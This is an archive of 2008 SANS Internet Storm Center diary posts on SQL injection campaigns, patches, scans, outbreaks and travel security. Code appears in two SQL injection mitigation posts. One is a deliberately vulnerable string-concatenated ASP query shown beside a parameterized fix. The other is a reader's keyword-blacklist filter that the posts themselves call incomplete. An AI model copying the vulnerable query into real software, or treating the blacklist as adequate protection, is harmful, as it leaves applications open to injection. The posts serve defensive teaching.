Published: 2008-06-30

More SQL Injection with Fast Flux hosting

One of our readers, Elazar, sent us some very good analysis of a SQL injection attack.  A summary of his findings is below.  We really appreciate it when readers observe an event, apply some noodle, then send in the analysis.  Thanks Elazar!

Looks like another hit, within the last week or so. More fast flux domains redirecting to other domains which then redirect to the malware site. What's interesting about this one is it doesn't look like they are using exploits to install the malware, they are redirecting to a fake AV site which fools users into installing the malware. Some of the domains hosting the injected js are as follows:


b.js then redirects to several domains which host a cgi script


Which then redirects to ad.js which redirects the user to

This site attempts to trick the user into installing installer.exe

AV coverage is decent:


Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2008-06-29

SANSFIRE 2008 - Meet the Handlers

OK, so it's not like Meet the Fockers but what the heck....  In less than a month we'll all be gathering in Washington DC for the annual big event sponsored by the SANS Internet Storm Center.  If you haven't already registered, it's not too late.  But please hurry!  Courses do sell out and you don't want to miss the opportunity to learn from SANS' top instructors and faculty.

While you are at SANSFIRE, be sure to check out our SANS @ Night talks, featuring Handlers from the Internet Storm Center.  We'll also have the annual "State of the Internet" panel where all of the Handlers (at least those who can make it to DC) will be present to talk about what is going on in the world of Internet security and how it applies to you and your networks.

Also, our CTO, Johannes Ullrich will be teaching a class on IPv6 security, Handler Lenny Zeltser will be teaching a class on Reverse Engineering Malware, and I will be teaching a class on Critical Infrastructure Protection.  We're looking forward to seeing you in one of the classes and for the evening talks!

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2008-06-28

Another Call for Packets - Port 502

Usually, I don't have two calls for packets on a shift, but this one definitely bears looking into and hopefully finding an answer.  There is an increase on port 502, when you look at the targets, that started today.  Until today, life has been pretty quiet on that port.  Port 502 is a known port when dealing with SCADA systems.  According to an article on SCADA Honeynets, "Modbus TCP on port 502 is a widely used, standard SCADA protocol in PLC’s and other field devices that monitor sensors and control instruments."

If you have packets, logs or ideas on this increase, please send them into us.


Published: 2008-06-28

Good Always Comes Out of Bad

In the past couple of days, reports have surfaced on the hijacking of the domains for ICANN and IANA, attributed to the group NetDevilz.  According to news articles, an ICANN spokesman stated they were unaware of the events.  The total time for the redirection before the entry was corrected was about twenty minutes.  However, it will take 24 to 48 hours after the correction to ensure all the DNS entries are updated.  In that time, users were redirected to a site that stated the following:

“You think that you control the domains but you don’t! Everybody knows wrong. We control the domains including ICANN! Don’t you believe us? haha :) (Lovable Turkish hackers group)”

What triggered the changing of the DNS entries has not been disclosed, as far as I have found.  Dancho Danchev's blog shows the email address listed in the updated records, "foricann1230@gmail.com", as well as the date they were updated, June 26.  Regardless of how it happened (though I'm sure everyone would like to know) there is a big concern here.  Nothing on the internet is safe, and if this can happen to these folks, it can happen to anyone.

It is events such as this that make me more determined to stay a hard nose when it comes to security and protecting the organization I am supporting.  These events actually do have good that comes out of them.  I always print out these articles, take a screenshot of the article and save it to a file with the URL of where I got it.  I can then add them to a presentation, use them as pass-arounds during a presentation, or simply highlight key points and discuss them with the group.  It is very useful to show management that the threat is real and we can't let our guard down.  Managers and users alike often don't understand security, the threats, how they work and the dangers that are lurking on the Internet.  It's hard for management to understand why your security officer sounds like a paranoid lunatic and wants more money for security :>)  Doing this has really helped me to get their attention and to justify the funding to help plus up weak points in our security posture.

So, take advantage of events that have high publicity such as these, include them in reports to your management and use them to help educate people.  Even though the bad guys may have gained an inch, let us use it against them to gain a mile in the world of security.  We can do this by learning from it, using it to increase awareness and moving our own security posture forward.


Published: 2008-06-28

Call for Packets - Port 19905

One of the things I like to check while on duty is the Trend reports, which focus on changes in port activity.  While looking at this today, I noticed a sharp increase in both the sources and targets for port 19905.  Generally target increases don't bother me too much and can be attributed to different things.  But with the sources and targets both increasing over the past few days for this port, it has me curious.  An increase in both sources and targets can be an indicator of an infection of some sort.  If you have any ideas for this or any packet captures, please send them our way.




Published: 2008-06-26

Automatic wireless connections

Normally, I'm annoyed when I can't get a wireless connection to the Internet. But recently, while riding the commuter train and working on my laptop, I was surprised by a "connected to..." pop-up that was immediately followed by a disconnect. Huh? Time for some checking. Turns out the problem was relatively benign. First of all, I had not turned off wireless like I normally do when it is not in use (I really like the mechanical "radio off" switch at the front of my Thinkpad). Secondly, I had recently stayed at an unnamed motel chain whose WLAN access points were using "Super8" as SSID. Even though I'm usually paying attention to this sort of thing, the SSID ended up staying behind as a "preferred network" with automatic connection in my Windows wireless profiles. I doubt that there is a motel of this chain next to the MTA Harlem line, but at least a matching SSID was present, and my PC eagerly latched on to it.

I don't mind automatic connection to a wireless network that uses a WPA key, there I know at least with some certainty what I am connecting to. But automatic connection to an "open" wireless network only because it happens to be called "Super8" or "Linksys" or whatever .... I really think those days should be over, the sooner the better.  Goes without saying that the list of "preferred networks" on my laptop is now empty again, or at least devoid of any non-WPA networks.



Published: 2008-06-26

How Well Would Your Business Survive?

Well, a month has passed since my State, the wonderful State of Iowa, began to receive some of the worst hammering from Mother Nature that we have ever seen.  It started out with tornadoes taking out whole towns at the end of May, then floods taking out towns and a large section of Cedar Rapids in June.


It just so happens that I was in Cedar Rapids the first week of June.  I spoke at a State Conference, Safeguard Iowa Partnership, and then went on to Des Moines where I spoke again.  Little did I know that just days later I would wake to hear that a large section (reported 1200 square blocks) of downtown Cedar Rapids was under water and that the Des Moines area was facing many problems due to high water and overflowing rivers and creeks.  The week before, while I was in Cedar Rapids, I went to visit one of my vendors who was located in the downtown area.  They were in a building that had a bank branch on the main floor and their offices occupied the 2nd floor of the building.


I finally was able to get in touch with them last week.  I asked them how they had fared the flood and they said they hadn't fared well.  They were advised to move out of their facility so they began moving things to higher ground, employees' homes, etc.  He said that their building ended up under water.  He said that the first floor was completely under water and that they had about 1.5 feet of water in the office area on the second floor.  Now I want you all to close your eyes, and picture a building in your city that is 4 or 5 stories tall.  Imagine that building (with high ceilings) completely under water to the 2nd floor.  We have a building here in the city that I live in that is almost identical to the bank building in Cedar Rapids. I cannot imagine the devastation that my fellow Iowans are feeling on the other side of the state.  The section of downtown that they were located in had many small businesses, really charming little pubs and restaurants.  They are all gone, under water, buildings uninhabitable and homes gone. My heart goes out to them.


Iowa is a small state by most people’s standards.  We have a total of 99 counties.  Of those 99 counties, 84 have been declared a disaster area by the Governor's Proclamation and 76 of those counties have received Presidential Proclamations.  We, in my part of the state, have been very fortunate.  Other than the tornado that destroyed our Boy Scout Camp and took the lives of 4 of our finest (Boy Scouts), we have dodged the bullet, but we have felt the pain that the rest of the state has felt.


We don’t have a final accounting of the financial costs to the state and it may be a long time before we know for sure.  However, the news tonight indicated that the loss expected just to the corn and soy crops is estimated to be 3 billion dollars.  Add to this the loss of resources, possessions, businesses and homes and you would think that the great people of Iowa would be ready to just pack it in.   But we aren’t, we are all pitching in, doing whatever needs to be done to make the recovery possible.  And our emergency personnel, Army and Air Guard units and responders, though very tired, have hung in like troopers.  They have made all the difference.


So why am I including this in the diary at the Internet Storm Center?  Really for two reasons: one, to update those who have asked and those who are concerned.  The second reason is to remind everyone, it is not “IF it happens - it is WHEN it happens".  Your business may never face the magnitude of destruction that we are dealing with, but without a plan, any destruction can mean the end of your business.  Plan for the future: how will your business go on, how will you continue to operate, where will they operate, and what resources will be needed?


If you would like to see photos or find out more information about what we are doing and how our recovery is going, check out our websites at http://flood2008.iowa.gov/ and http://www.safeguardiowa.org/. You will find information about our recovery efforts.


To my fellow Iowans I say “I am proud of all of you, proud of your resiliency and your determination”.  We will rebuild, and we will recover and be stronger and closer for having been here.


Published: 2008-06-25

Podcast Episode Seven Posted

Thanks to all of those who joined us live last night!  It was great to have that live feedback.  Johannes, Paul, and I were all live on video and audio, and it worked great.

We published Episode Seven of the Internet Storm Center Podcast this morning.

It would be great if we could increase the live listener count, as I'd like to do a live Q&A with the listeners (and other fun live events).  I will try and post the live stream address sooner next time.  I know I didn't give you guys a lot of warning.

We had Paul Asadoorian of PaulDotCom Security Weekly as a guest, and it's probably our best podcast yet!

Go grab it through iTunes, and for those of you that are not listeners of PaulDotCom, please subscribe to that one too!

Direct download of the mp3 is here, for those of you that are not iTunes users.



Joel Esler



Published: 2008-06-25

Report of Coreflood.dr Infection

We have had a report tonight of an outbreak of an old friend, a blast from the past.  It appears that this particular outbreak has impacted/infected about 600 machines in a roughly 3000 PC network.  Rick, our reader reporting this, said that they have not been able to determine the exact infection entry point yet, but, according to Rick, they suspect the following:

"Current theory is iframe in web page browsed by an 'IU' (Idiot User). "

I like that line, don't you?  Anyway, he said that they have discovered that this infection has resulted in a bunch of new user IDs being created on the computers.  When I asked him if they had discovered the mechanism used to spread to the machines, his reply was:


"My current theory is that the patient 0 system's user was set for sub-domain admin privs, and that allowed it to connect to the C$ share on other systems to infect those systems. Each time an infected system connected to a new system, a user profile was created on that new system. Eventually, all of those infected systems connecting to other systems gave the result of many (30+) user profiles on other systems."

He said that McAfee is reporting a "buffer overflow" in a pop-up message on some of the systems and Norton is reporting it as Coreflood.dr.

Rick is hoping some of our readers may have dealt with this bad boy in the past and can provide us with a little insight into what they are seeing.  Please let us know if you have any tips for Rick and his team.


Published: 2008-06-24

Microsoft SQL Injection Prevention Strategy

Microsoft released a security advisory today in reaction to the mass SQL injection exploitation on the Internet. Unlike most other Microsoft security bulletins and advisories, this one isn't about Microsoft products. According to the advisory, "These SQL injection attacks do not exploit a specific software vulnerability, but instead target Web sites that do not follow secure coding practices for accessing and manipulating data stored in a relational database."

Aside from providing links to information on SQL injection, Microsoft recommends three approaches to help mitigate it.

1. Runtime scanning

HP trimmed down a version of the WebInspect scanner to look for SQL injection vulnerabilities on a running website. Please note this scanner is very basic and should be used for a quick inspection only. I like the fact that the scanner has the ability to dump table names, which helps eliminate false positives.

2. URLScan

Microsoft's basic Web application firewall solution. It has the capability to block unwanted requests. This should only be used as a proactive measure or as an emergency (short-term) fix for SQL injection vulnerabilities.

3. Code Scanning

MS released a nice ASP source code scanning tool to look for SQL injection flaws. It is focused on SQL injection and seems to produce very few false positives, which can be a problem with a lot of code scanners.

You may ask, runtime or code? The answer is both, if you can do it. For example, if the ASP file calls a stored procedure in the database and the stored procedure then performs an EXEC on a string it built by concatenation, code scanning will not flag this problem because the ASP code looks fine (only the stored procedure is the problem). Conversely, runtime scanning can miss some portions of the site because this specific version of the scanner does not follow JavaScript and does not submit POST requests during the spidering process.

Kudos to Microsoft for releasing the tools and information to help developers fix their apps. We also appreciate the free scanner from HP.



Published: 2008-06-24

Podcast Episode Seven Record Notice

Hey all, just to let you all know, Johannes, Paul Asadoorian (of PaulDotCom Security Weekly fame) and I will be recording the Internet Storm Center Podcast (Episode 7) tonight at 7:30 pm EDT.

I'll be broadcasting it live on Stickam (Ustream seems to be having issues today):

Paul, Johannes, and I all have stickam accounts and we will all have live video and audio during the podcast, so you will be able to see and interact with all of us!

See you there if you can make it.  We want to see if we can get a good number of live listeners when we do the podcasts; Stickam has a chat interface so you can give us LIVE feedback on the topics we are discussing on the podcast.

If you don't want to sign up for an account on Stickam, don't forget our IRC channel on irc.freenode.net, #dshield.  So come and hang out, talk with us about topics, live!


Joel Esler



Published: 2008-06-24

Adobe Reader and Acrobat 8.1.2 Security Update

Adobe released a security update today for Acrobat and Reader 8.1.2. It fixes a vulnerability which allows a remote attacker to execute malicious code. This is likely to appear in a malware-spreading website near you soon, given the track record of the botnet operators. We suggest updating this one as soon as possible: http://www.adobe.com/support/security/bulletins/apsb08-15.html



Published: 2008-06-24

SQL Injection mitigation in ASP

With the recent SQL injection attacks on ASP pages, a lot of our readers are scrambling to find fixes for their applications. ASP is an older-generation Web scripting language and requires a bit more work to prevent SQL injection from happening. One of our readers, Brian Erman, has written a function to filter out SQL keywords and also escape some of the SQL metacharacters in order to prevent SQL injection.

I have been asked a few times recently just how safe escaping data before passing it to SQL Server is. The answer is that it is reasonably safe but not fool-proof; some of the issues have been documented by Chris Anley in his "Advanced SQL Injection In SQL Server Applications" paper. Essentially, escaping input is making bad input less bad, so it's not ideal.

To stop SQL injection at the root, we have to understand that SQL injection happens because the database cannot effectively distinguish between the static portion of the SQL statement and the user input. If there is a way we can tell the database "this is the static SQL statement and this is the user input", SQL injection can be stopped easily.

In actual fact, such a mechanism exists: it is called a parameterized query. The user input is passed to the SQL server as an argument (sort of like calling a function in a programming language), so during query execution the SQL server has a way to identify which part of the statement is static control and which part is user input.

Parameterized queries have been widely publicized; examples are here and here. In classic ASP, a parameterized query is possible if you use the ADO Command object; an example is here. Parameterized queries are available on most other web scripting platforms, so now is the time to review all your web apps before the automated SQL injection exploitation spreads to other language platforms (PHP, CFM, PL).
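As an added example that is not part of the original diary or of Brian's code, here is the same lookup written both ways in classic ASP: the string-concatenated query beside its replacement using the ADO Command object with a ? placeholder. The connection string, the Users table with its username and email columns, and the "user" query-string parameter are all assumed.

```vbscript
' Added example, not from the diary or its author.  Classic ASP (VBScript)
' against SQL Server through ADO.  Assumed: the connection string below and
' a Users table with username and email columns.
Option Explicit
Const adCmdText = 1        ' ADO constants, normally taken from adovbs.inc
Const adVarChar = 200
Const adParamInput = 1

Dim connStr
connStr = "Provider=SQLOLEDB;Data Source=(local);Initial Catalog=Shop;Integrated Security=SSPI"

' VULNERABLE: the value of ?user= is spliced into the SQL text, so the
' database cannot tell where the fixed statement ends and the input begins.
Function LookupEmailUnsafe(userName)
    Dim conn, rs
    Set conn = Server.CreateObject("ADODB.Connection")
    conn.Open connStr
    Set rs = conn.Execute("SELECT email FROM Users WHERE username = '" & userName & "'")
    If Not rs.EOF Then LookupEmailUnsafe = rs("email").Value Else LookupEmailUnsafe = ""
    rs.Close : conn.Close
End Function

' SAFE: the statement is fixed text with a ? placeholder; the input reaches
' SQL Server as a typed argument and is never parsed as part of the SQL.
Function LookupEmailSafe(userName)
    Dim conn, cmd, rs
    Set conn = Server.CreateObject("ADODB.Connection")
    conn.Open connStr
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    cmd.CommandText = "SELECT email FROM Users WHERE username = ?"
    ' CreateParameter(name, type, direction, size, value); the size is the
    ' declared length of the parameter (assumed to match the column width)
    cmd.Parameters.Append cmd.CreateParameter("@username", adVarChar, adParamInput, 50, userName)
    Set rs = cmd.Execute
    If Not rs.EOF Then LookupEmailSafe = rs("email").Value Else LookupEmailSafe = ""
    rs.Close : conn.Close
End Function

' Page body: the input is read exactly as before; only the query changed.
' Encoding the output for HTML is a separate concern from the SQL side.
Response.Write Server.HTMLEncode(LookupEmailSafe(Trim(Request.QueryString("user"))))
```

The parameter only protects the statement the page itself sends: if the page instead calls a stored procedure that concatenates its argument into an EXEC, as the 2008-06-24 diary on Microsoft's tools describes, the database side has to be fixed too (sp_executesql with parameters rather than EXEC of a built-up string).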

Want to learn more about SQL injection mitigations? At SANSFIRE, we will debut our new class, SEC522 "Defending Web Applications". It's an updated version of SEC519 ("Web Application Security") and now covers web services and other new topics.





Published: 2008-06-23

Preventing SQL injection

Here is a function that a reader wrote that sanitizes all inputted data.
I am not an ASP programmer so I cannot claim that it is complete or correct,
but it does appear to work.

This was written by Brian Erman.
Brian spent many hours testing and modifying it to make it work. It has stopped
the insertion of bad data into their database. They have been using it now for
over 1 month and have not had a single SQL injection since they added this function.

It eliminates any string that contains the word "declare" and shoots the requester
off to Google. It also builds a new string from the old one character by character,
copying only permitted characters, rather than passing the original string through.

It also replaces known keywords (e.g. insert, delete, etc.) that may cause
problems within SQL.

,,,,,,Begin Function,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
'Emails the details of a blocked input.  This assumes you are using CDO as
'your object for sending mail; if you have CDONTS on your server, simply
'change the CDO to CDONTS and it should process exactly the same.  Replace
'Email_From, Email_To and Your_Domain with your own values.
Sub reportattempt(str, char)
    Dim Mailer, msg
    Set Mailer = Server.CreateObject("CDO.Message")
    Mailer.From = "Email_From"
    Mailer.To = "Email_To"
    Mailer.Subject = "Your_Domain Hacking Attempt"
    msg = Date & VbCrLf & VbCrLf
    msg = msg & "Hacking Blocked, but check the data" & VbCrLf & VbCrLf
    msg = msg & "STR: " & str & " char " & char & VbCrLf & VbCrLf
    msg = msg & "Here is the IP " & Request.ServerVariables("REMOTE_ADDR") & VbCrLf & VbCrLf
    msg = msg & "Web Page " & Request.ServerVariables("URL") & VbCrLf & VbCrLf
    msg = msg & "Host " & Request.ServerVariables("HTTP_HOST") & VbCrLf & VbCrLf
    msg = msg & "Length of String " & Len(str) & VbCrLf & VbCrLf
    Mailer.TextBody = msg
    Mailer.Send
    Set Mailer = Nothing
End Sub

Function cleanchars(str)
'This goes in the page that you want to clean the data with.
'Here is the call for the function:
'fname = cleanchars(trim(Request("xxxxx")))
'President Brian Erman
'Nopork Motorsports, Inc.
'2585 Hamner Ave,
'Norco CA 92860
'This is licensed under the creative commons attribution-noncommercial 3.0 framework
'Note: the result comes back lowercased, and the keyword removals at the end
'are plain substring matches, so ordinary words that contain them (for
'example "reset" or "settings") are altered too.
    Dim newstr, ii, char
    newstr = ""
    char = ""

    'A single quote anywhere discards the whole input
    If InStr(str, "'") > 0 Then
        str = ""
    End If

    'Any input containing "declare" (in any case) is discarded and reported,
    'and the requester is sent off to Google
    If InStr(1, str, "declare", vbTextCompare) > 0 Then
        reportattempt str, char
        cleanchars = ""
        Response.Redirect "http://www.google.com/"
        Exit Function
    End If

    'Rebuild the string one character at a time, keeping only the characters
    'listed below; anything else is dropped and reported by mail
    For ii = 1 To Len(str)
        char = Mid(str, ii, 1)
        Select Case char
            Case " ", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", _
                 "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", _
                 "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", _
                 "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", _
                 "3", "4", "5", "6", "7", "8", "9", "@", ".", "-", "_", "/", "&"
                newstr = newstr & char
            Case Else
                reportattempt str, char
        End Select
    Next

    'Over-long input is discarded
    If Len(str) > 350 Then
        newstr = ""
    End If

    'Lowercase once, then strip SQL keywords, URL-encoded and HTML-encoded
    'metacharacters, and other fragments seen in the injection attacks
    newstr = LCase(newstr)
    newstr = Replace(newstr, " or ", "")
    newstr = Replace(newstr, " and ", "")
    newstr = Replace(newstr, " from ", "")
    newstr = Replace(newstr, " into ", "")
    newstr = Replace(newstr, "insert", "")
    newstr = Replace(newstr, "update", "")
    newstr = Replace(newstr, "set", "")
    newstr = Replace(newstr, "where", "")
    newstr = Replace(newstr, "drop", "")
    newstr = Replace(newstr, "values", "")
    newstr = Replace(newstr, "null", "")
    newstr = Replace(newstr, "http", "")
    newstr = Replace(newstr, "js", "")
    newstr = Replace(newstr, "declare", "")
    newstr = Replace(newstr, "script", "")
    newstr = Replace(newstr, "xp_", "")
    newstr = Replace(newstr, "crlf", "")
    newstr = Replace(newstr, "%3a", "")       ':
    newstr = Replace(newstr, "%3b", "")       ';
    newstr = Replace(newstr, "%3c", "")       '<
    newstr = Replace(newstr, "%3d", "")       '=
    newstr = Replace(newstr, "%3e", "")       '>
    newstr = Replace(newstr, "%3f", "")       '?
    newstr = Replace(newstr, "&quot;", "")    '"
    newstr = Replace(newstr, "&amp;", "")     '&
    newstr = Replace(newstr, "&lt;", "")      '<
    newstr = Replace(newstr, "&gt;", "")      '>
    newstr = Replace(newstr, "exec", "")
    newstr = Replace(newstr, "onvarchar", "")
    newstr = Replace(newstr, " cast ", "")
    newstr = Replace(newstr, "00100111", "")  'binary for '
    newstr = Replace(newstr, "00100010", "")  'binary for "
    newstr = Replace(newstr, "00111100", "")  'binary for <
    newstr = Replace(newstr, "select", "")
    newstr = Replace(newstr, "0x", "")
    newstr = Replace(newstr, "exe", "")
    newstr = Replace(newstr, "delete", "")
    newstr = Replace(newstr, "go ", "")
    newstr = Replace(newstr, "create", "")
    newstr = Replace(newstr, "convert", "")
    cleanchars = newstr
End Function
,,,,,,End Function,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

Additionally several sites have published documents describing how to prevent SQL injection.
Open Web Application Security Project:

Canadian Cyber Incident Response Centre:


Published: 2008-06-23

SSH scans, source port 80?

Got an email today from a reader named Justin (thank you Justin) who asks us if we have seen a lot of SSH scans with a source port of 80 before.  Of course, the answer is yes, but only in test cases!

I've never actually seen this take place on the internet (well, yes, I have, but very very rarely), and of course I can cause it with certain nmap settings.  But as far as I know, this kind of scanning isn't commonplace in an automated tool or script kiddie run.

Any information that anyone could provide so that we can help out Justin, and of course the rest of the readers of the Internet Storm Center would be much appreciated.  Please write in via that Contact link at the top of our home page.  Thank you.


Joel Esler



Published: 2008-06-20

BackTrack 3 Released

Over at Remote-Exploit.Org, BackTrack 3 has been released. Thanks Max, Muts, MjM! and Raul.
The download link is BackTrack 3.



Published: 2008-06-20

Safari 3.1.2 for Windows released to address vulnerabilities

Safari 3.1.2 for Windows was released to address:

CVE-ID: CVE-2008-1573
Available for: Windows XP or Vista
Impact: Viewing a maliciously crafted BMP or GIF image may lead to information disclosure

CVE-ID: CVE-2008-2540
Available for: Windows XP or Vista
Impact: Saving untrusted files to the Windows desktop may lead to the execution of arbitrary code


From - "About the security content of Safari 3.1.2 for Windows"

Safari 3.1.2 for Windows - "This update is recommended for all Safari Windows users and includes stability improvements and the latest security updates".

Thanks to all of the folks that submitted links!


Published: 2008-06-20

MS08-030 has a new patch, for XP SP2 & XP SP3

Microsoft issued a new patch, for XP SP2 & XP SP3, for MS08-030: Vulnerability in Bluetooth stack could allow remote code execution. "Customers who are running Windows XP Service Pack 2 and Windows XP Service Pack 3 should download and deploy this new security update. Customers running Windows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2 and all supported versions of Windows Vista who have already applied these original security updates do not need to take any further action".

MS08-030: Vulnerability in Bluetooth stack could allow remote code execution

The Technet Security Vulnerability Research & Defense blog on the vulnerability was "MS08-030: All bark and no bite? The case of the Bluetooth update".

Related update: KB951376 Security Update for Windows XP

Thanks for the heads-up, Guy.


Published: 2008-06-19

Time Warner outage

Time Warner appears to be experiencing an outage of an OC-192 link in Ohio.  Chad and one other reader report that this is causing throughput, latency and stability problems.

-- Bill Stearns, http://www.stearns.org

UPDATE:  Information received indicates it is all back to normal (Thanks Chad)



Published: 2008-06-18

Cisco Security Advisory

Cisco Intrusion Prevention System (IPS) platforms that have gigabit network interfaces installed and are deployed in inline mode contain a denial of service vulnerability in the handling of jumbo Ethernet frames. This vulnerability may lead to a kernel panic that requires a power cycle to recover platform operation. Platforms deployed in promiscuous mode only or that do not contain gigabit network interfaces are not vulnerable.

Cisco has released free software updates that address this vulnerability. There is a workaround for this vulnerability.

This advisory is posted here


Published: 2008-06-18

Olympics Part II

On June 16th we published a short diary asking for comments about the dangers of bringing laptops, PDAs, cell phones, etc. to China if you are planning to attend the Olympics in August.  We've received a number of interesting comments and I want to share two of them with our readers.  I have not made any changes, these are cut/paste right out of the emails we received.  If you have any comments, you can use the comment button at the bottom of the diary entry or send us your notes via our contact page.

One reader wanting to remain anonymous said:

We are recommending our users be very aware of the devices they take with them.  We have recommended leaving all but essential electronic communications and storage devices behind, to include cellular phones with any storage capability.  Users should be aware of the presence of their equipment at all times, not leaving personal or professional equipment unattended, in a hotel room, or locker for any amount of time, and be ultimately suspicious of any portable storage device purchased, received, or given to/from another party while travelling.  This includes USB, CD, SD (other variations) or any other flash media.  I am particularly concerned with the custom trojan infections coming back through flash-based media from traveling parties, whether through their personal computers cross-contaminating professional assets, or on media that they bring into the workplace.  These trojan variants typically evade AV for up to three months, are very slow to spread, and present deep, slow infiltration into the machine whose backchannels can lead to data loss and lateral control of other machines.

Protecting the enclave from those that return to the workplace with such an infection relies on strong program whitelists ('gold disks'), standard images, and possibly mandated reimaging on return with all returning data stored to CD media, scanned, and manually reviewed for autorun.inf infection vectors prior to reintroduction.  Support for strong policy enforcement from the highest levels with crystal clear consequences is essential to prevent the enticement of easy work-arounds for returning workers.  Returning expats should have an in-briefing meeting and sign a statement indicating that they have reviewed the policy, are aware of its meaning, and have not brought back any non-company media to the best of their knowledge.  At that time, they are given a one-time opportunity for amnesty to provide anything they may have forgotten to leave behind.

This may seem harsh, but how valuable is control of company assets, core data, proprietary secrets, etc?  If you don't protect it, China has made it very clear that 'no holds barred' is fair game and they WILL take it to their full advantage.

Another anonymous reader had this to say:

I think it might be even more useful to turn the question posed completely around... 

What do we observe foreign nationals doing when they visit/meet with us in an official capacity on our soil? 

The "us" and "our" being the USA and "official" meaning rubber-meets-the-road business/corporate critical meetings (often times under multi-party/multi-lateral NDA-s, to protect real intellectual property, representing tangible products, resulting from millions of name-that-currency spent on R&D). 

Having participated in a few of these meetings, of late, I can say that senior scientists and engineers employed by great Asian nations have not been bringing any laptops/notebooks/gadgets to said meetings. 

When they carry cell phones/PDAs, these are all scrupulously powered off and tucked out of sight, prior to entering "foreign" (to them) corporate campuses.  It is a parking lot ritual of sorts that I have personally witnessed. 

All notes they take are written on paper.  (As are mine, which I review and flesh out from memory as soon as the last goodbye-s are exchanged.) 

Any electronic presentations they bring are on hardware write-protected USB solid state storage and the meeting's host is expected to provide the computer that will run the presentation (either PowerPoint or PDF). 

Sometimes there are only printed handouts, which may or may not be collected at the conclusion of the meeting.  (Usually handouts that are to be re-collected are uniquely marked in advance.)

Of course, every one of "us" (myself excluded) attends these same meetings with our laptop/notebook/tablet, cell phone, PDA powered on *and* wireless enabled. 

Many of the latest gee-whiz compute/communicate devices that our Asian counterparts are using day-to-day these days are not for sale on our shores.  We are often times disappointed when we do not get to see these trinkets on display at these meetings. 

What many of us fail to realize is that our auspicious visitors/guests are voluntarily abiding by a scrupulous electronic quarantine, in specific situations, while on our soil. 

Whereas, too many of us tend to be electronic cowboys, with our "rigs" fully exposed, whether or not we happen to be travelling abroad. 

Food for thought???... 

The same anonymous reader had these additional comments:

For "Mark," even if his crew is using terminal services on as-is off-the-shelf stock, what about keystroke loggers and/or rootkits, on the terminal services client machine, that could be planted over-the-wire(less) and need not persist beyond a single snoop session??? 

I am a firm believer in hardening all portable compute devices, as much as they can be, whether or not they're to be taken abroad. 

As-is, from the manufacturer, all my Vista notebooks have had crap like Bluetooth and Firewire services enabled, whether or not there is an internal Bluetooth device or even a Firewire port, by default. 

Presumably, these services are pre-enabled just in case I (or anyone else) decides to plug in a USB-bridged and/or PCMCIA Bluetooth or Firewire device. 

How convenient for me...  and all of my would-be attackers. 

Why should every physical port present (or not) on a mobile compute platform be permitted to become a potentially illicit port of entry/leakage??? 

I prefer to disable everything I don't need for the job and selectively enable what I do need, as much as possible, for only while I need to use it. 

Seriously consider fully supporting (Vista) BitLocker or some other full disk encryption on business critical mobile compute platforms, as well as on removable storage.  MS does not encrypt the pagefile (although I've been told that MacOS does) and some terminal services session data will likely persist for a while in a large pagefile. 

At the very least, I say make the BadGuys(TM) work for pwnership. 

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2008-06-17

Why go high-tech?

We received a report today from an EDU that received hundreds of undeliverable notices from other EDU domains.  Their "helpdesk" email box had been used as the spoofed from address in a simple "ask for the user's password to avoid account closure" attempt to gather email account passwords from unsuspecting college students.  But instead of going to a website, the user is just supposed to send the account details to an email address at the bottom of the page.  Turns out that a couple of them replied with their account details to the EDU, instead of the attacker.  It is somewhat of a catch-22 for the attacker: use a more official "from" address and the user is more likely to reply; but the same user is likely not to follow the directions at the bottom of the message stating to send the reply to xyz@attacker.com. 

The story reminds me of "stupid criminal" stories.  But on the Internet, there is less chance of getting caught and more likelihood that someone will fall for the attack.


Published: 2008-06-16

Going to the Olympics?

Are you or one of your organization's employees planning to attend the Olympics in Beijing this August?  If so, are there any precautions you are taking (or recommending for your staff to take) when bringing computers, PDAs, or other electronics potentially containing intellectual property on a trip to China?  I'm not suggesting that China is a dangerous place (after all, nearly anywhere on the planet you can find trouble) but there has been a lot of talk recently about cybersecurity issues in China.

So we are curious, what are you doing to protect your organization against potential theft, or even worse - the potential addition of "value added features" to your computers and devices while you are not looking?  Send us your ideas, concerns, and comments and we'll add the best ones to this diary.  You can also use the "comment" feature below to directly add your thoughts.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2008-06-16

Opera 9.5 is Available

Parth just informed us that Opera 9.5 is available at: www.opera.com/

This version addresses a few security issues: www.opera.com/docs/changelogs/windows/950/#security




Published: 2008-06-15

Happy Father's Day

In most countries June 15th is Father's Day this year.  So, to all of the dads out there in reader-land, we extend our warmest Happy Father's Day wishes.  Kids, be sure to call the Old Man today if you are no longer living at home and tell him how you are doing.  If you are still living in your parent's basement, then come upstairs and tell him how much you appreciate that high-speed Internet connection he's paying for.  :)

While you are on the phone (or IM'ing) with Dear Old Dad, ask him if he's got automatic updates turned on for the home computer and if he keeps his antivirus software updated.  Also check to make sure that he's got a good firewall in place.  Those three things will keep most of the evilware out of the family computer.  Beyond that, we can't stop Dad from surfing to parts of the Internet he should not be going to, from downloading lots of cool widgets and programs, or from engaging in file swapping.  But we can keep him educated on the latest threats and countermeasures.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2008-06-14

Malware Detection - Take the Blinders Off

How many times have you sat in a discussion talking about how to protect against malware and the focus is always on what type of antivirus to use?  Do you use one vendor to keep it simple or do you use at least two vendors to get better coverage?  I don't disagree that antivirus software is an essential tool in your security architecture and I'm an advocate of it.  But my point is that we have severely restricted our abilities to detect malware when the only focus is an antivirus solution.  When this is the case, you are operating with blinders on.

